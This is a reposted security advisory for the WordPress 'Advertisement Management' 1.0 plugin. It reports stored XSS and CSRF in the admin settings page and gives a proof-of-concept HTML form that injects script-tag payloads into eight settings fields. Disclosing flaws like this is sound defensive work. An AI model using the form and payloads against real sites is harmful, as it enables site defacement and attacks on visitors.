» » WordPress Advertisement Management 1.0 Cross Site Scripting Vulnerability
Edit

WordPress Advertisement Management 1.0 Cross Site Scripting Vulnerability













###########################



# WordPress Advertisement Management 1.0 Cross Site Scripting Vulnerability



###########################



Title: WordPress 'Advertisement Management' Plugin

Version: 1.0

Author: Black Worm

Date: 2015-08-08

Download:

- https://wordpress.org/plugins/advertisement-management/

- https://plugins.svn.wordpress.org/advertisement-management/

==========================================================



## Plugin description

==========================================================

Advertisement Management lets you administrate all the blog advertisements diretctly from the blog backend.



## XSS/CSRF vulnerabilities

==========================================================

The settings on the admin page is vulnerable to XSS.



PoC:

Log in as admin and submit the this form



<form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update">

<input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>">

<input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>">

<input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>">

<input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>">

<input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>">

<input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>">

<input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>">

<input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>">

<input type="submit">

</form>



After having done this, some of the injected scripts will be executed when loading the front page of the site.



## Solution

==========================================================

No fix available



==========================================================

XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

sources : http://www.exploit4arab.net/exploits/1723

0 Response to "WordPress Advertisement Management 1.0 Cross Site Scripting Vulnerability"

Posting Komentar

Langganan: Posting Komentar (Atom)